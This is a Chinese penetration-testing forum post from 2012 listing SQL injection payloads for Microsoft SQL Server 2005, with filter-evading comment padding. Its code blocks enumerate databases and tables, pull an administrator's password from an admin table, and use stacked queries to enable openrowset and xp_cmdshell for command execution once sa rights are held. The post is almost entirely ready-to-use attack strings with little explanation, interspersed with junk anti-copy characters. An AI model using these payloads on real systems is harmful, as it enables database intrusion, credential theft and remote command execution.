找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsql2005注入语句
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2782|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

& n) M1 X( i' V0 \( Q' ~8 N6 p1 U& L1 T+ c/ U

( n( Z+ ^% k% S" i5 i! |5 {8 A$ Q[Copy to clipboard]CODE:& C1 y' Z6 Q5 V
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
' T: }* ?' H9 C. B/ m6 [9 y5 G: m  R  x
爆表语句,somedb部份是所要列的数据库,红色数字1累加# w8 V  g% t: y- e

0 {0 ^5 u& g/ N; H+ t+ P  y9 S. y; y5 r- k
[Copy to clipboard]CODE:! J- E/ b5 Y3 X- g- U
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
( F9 q) e3 c& v( T( y: y2 [2 S) M+ {( s
爆字段语句,爆表admin里user='icerover'的密码段
, x1 m$ V- R) G# y! ~/ r* u. _; d2 `( x2 M% I7 L* A
7 B4 C& b3 w2 C  T! b. U
[Copy to clipboard]CODE:
# ~" i7 a( f9 B9 ~5 f( `**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--) n% m6 ]! N% E: j

6 q3 C3 f1 J' [: e. kmssql2005默认没有开xp_cmdshell的,openrowset也不能用# k& V4 _: X. u5 k' q
如果是sa权限,可以这样来开启
8 n7 r/ n: L- \* m开启openrowset, f+ t( ?! t/ H  ^. A
, w5 E& l. M/ H$ U# R! q( W4 }, P# Y

! D. \8 ]' u. K7 T9 |[Copy to clipboard]CODE:
7 A7 b; ]' o6 ]/ U1 E2 T: m5 T/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
2 F  _; f3 t! y& I  A/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
3 \' K" F# Q) A9 g! K7 c1 h
6 I1 A+ W. i& }) R1 M% }) K开启xp_cmdshell
4 a. P9 s9 E+ }* Q9 k" [+ r% s. f% C  \
  {4 o/ D# z7 q( F( y' u
[Copy to clipboard]CODE:: C+ _6 @9 o3 D' |, m4 k2 U
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
, F+ Y8 @4 x, fEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
3 r( _0 u7 y$ H' W  V/ I3 E! L6 `1 a) j' @( p
ok,over~~晚安: J$ L3 E9 j' R6 _3 G: [
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表